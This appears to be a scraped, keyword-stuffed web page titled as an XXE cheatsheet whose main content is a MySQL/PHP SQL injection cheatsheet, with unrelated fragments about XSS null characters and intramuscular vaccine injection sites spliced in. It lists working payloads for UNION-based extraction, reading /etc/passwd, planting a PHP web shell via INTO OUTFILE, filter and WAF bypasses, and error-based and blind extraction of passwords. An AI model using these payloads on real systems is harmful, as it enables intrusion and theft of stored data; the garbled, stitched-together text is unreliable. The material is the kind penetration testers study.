May 16, 2015 Cheat Sheets / Infrastructure / Web Application Security. XXE Cheatsheet – XML External Entity Injection. By HollyGraceful May 16, 2015 February 2, 2020.
- Url Injection Cheat Sheet Template
- Command Injection Cheat Sheet
- Url Injection Cheat Sheet
- Url Injection Cheat Sheet Pdf
Null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy or use%00 in the URL string or if you want to write your own injection tool you can either use vim (^V^@ will produce a null) or the following program to generate it into a text file. Okay, I lied again, older versions of. Dec 24, 2010 The Book takes care to explain the elevation of Cross-Site Scripting (XSS) to the title of HTML Injection. This quick reference describes some of the common techniques used to inject a payload into a web application.In the examples below the biohazard symbol (U+2623), ☣, represents an executable JavaScript payload. SQL injection A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. Attempting to manipulate SQL queries may have goals including: Information Leakage Disclosure of stored data Manipulation of stored data Bypassing authorisation controls Summary CheatSheet MSSQL Injection CheatSheet MySQL Injection CheatSheet. Alternate the injection site each time you inject to avoid soreness at any one sight. Deltoid Site: Find the lower edge of the acromial process and the point on the lateral arm in line with the axilla. Insert the needle 1” to 2” below the acromial process, usually two or three fingerbreadths. Typical injection: 0.5 ml (range: 0.5 to 2.0 ml).
Slack3rsecurity’s SQL injection cheatsheet 2011.
Hello world! I have decided to write a cheatsheet containing all that i have learnt from 2 years in the web application security field, in this post i will be focusing on SQL injection in regards to a PHP/MySQL enviroment .
Comments
/* – Multi line comment.
# – single line comment.
— – single line comment.
/*!*/ – Mysql special comments.
Whitespaces.
+, %2B, %20, %09, %0d ,%0А, /**/, /*foo*/
Url Injection Cheat Sheet Template
Global system variables
@@datadir // Mysql data directory.
@@version_compile_os – //OS Mysql is running on.
@@version – //Mysql database version.
user() – //Current database user.
@@log_error – //Path to error log.
database() – //Current database.
Columns in a SELECT.
file.php?var=1 order by 10– //Unknown column ’10’ in ‘order clause’
file.php?var=1 and(select * from table)=(1)– //Operand should contain 9 column(s)
Encoding. //For matching collations.
file.php?var=1 union select cast(version() as latin1)– //5.0.11
file.php?var=1 union select convert(version() as binary)– //5.0.11
file.php?var=1 union select aes_decrypt(aes_encrypt(version(),1),1)– //5.0.11
file.php?var=1 union select unhex(hex(versions()))– //5.0.11
File_priv.
file.php?var=1 union select user()– //Checking current user. root@localhost
file.php?var=1 union select file_priv from mysql.user where user=’root’– //Checking for the file priveledge on current user, Y =Yes N=No.
file.php?var=1 union select load_file(‘/etc/passwd’)– // Loading system files.
file.php?var=1 and+(select+1+from+(select+count(0),concat((select+load_file(‘/etc/passwd’),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)– // Loading system files with error based injection.
file.php?var=1 union select “<?php system($_GET[c]);?>” into outfile ‘/dir/dir/shell.php’– // Write code to a file.
file.php?var=1 limit 1 into outfile ‘/dir/dir/shell.php’ lines terminated by “<?php system($_GET[c]);?>”–+ //Write to a file.
WAF & security bypasses.
file.php?var=1 /*!union*/ /*select*/ version()– //MySQL comments.
file.php?var=1 unUNIONion seleSELECTct version()– //Filter bypass
file.php?var=1/**/union/**/select/**/version()– //Whitespace bypass
file.php?var=1 UnION SElecT version()– //Mixed upper/lower
file.php?var=1 uni/**/on sel/**/ect version()– //php comments.
file.php?var=1 uni%6Fn select version()– //URL encoding.
file.php?var=1 %252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users– //Taking advantage of a WAF that only decodes input once.
file.php?var=1 0x414141414141414141414141414141414141 union select version()– //Buffer overflow.
file.php?var=1 union select 0x3a3a3a– //Encode to bypass magic quotes.
Extracting data from MySQL errors.
Rand()
file.php?var=1 and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)–
file.php?var=1 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select version() from information_schema.tables limit 1),1,64),floor(rand(0)*2)))–
file.php?var=1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand(0)*2)) x from (select 1 union select 2)a group by x limit 1) —
file.php?var=1 or (select count(*) from table group by concat(version(),floor(rand(0)*2)))–
file.php?var=1 union select password from users where id=1 and row(1,1)>(select count(*),concat( (select users.password) ,0x3a,floor(rand()*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) —
Name_const(Mysql 5.0.12 > 5.0.64)
file.php?var=1 or(1,2)=(select * from(select name_const(version(),1),name_const(version(),1))a)–
Extractvalue & updatexml (MySQL 5.1+)
file.php?var=1 and extractvalue(rand(),concat(0x3a,version()))– //Xpath error
file.php?var=1 and updatexml(rand(),concat(0x3a,version()))– //Xpath error
Misc.
file.php?var=(@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)– //Credits BlackFan.
file.php?var=(@:=9)or@ group by left(@@version,@:=~@)having@||min(0)– //Credits Blackfan.
file.php?var=1 UNION SELECT * FROM (SELECT version() FROM information_schema.tables JOIN information_schema.tables b)a–
Command Injection Cheat Sheet
Injecting into an order by
file.php?var=(select if(substring(version(),1,1)=4,1,(select 1 union select 2)))–
file.php?var=1,ExtractValue(1,concat(0x5c,(sele ct table_name from information_schema.tables limit 1)))–
Blind.
file.php?var=1 and IF(ASCII(SUBSTRING((SELECT version()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) — //time based BSQLi
file.php?var=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) — //Time based BSQLi
file.php?var=1 AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), ‘a,b,c,d,e,f
,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,
$,%,^,&,*,(,),-,+,=,.,”,’,~,`,|,{,},[,],:,;, ,’)),1,1) FROM in
formation_schema.tables LIMIT 1)=@a AND IF(@a!=”,@a,SLEEP(5))– //BSQLi using bit shifting credits to http://www.websec.ca
Url Injection Cheat Sheet
Have a question or something you have to add? shoot me a message.
Helpfull links.
http://www.websec.wordpress.com //Great blog & good posts on web application security.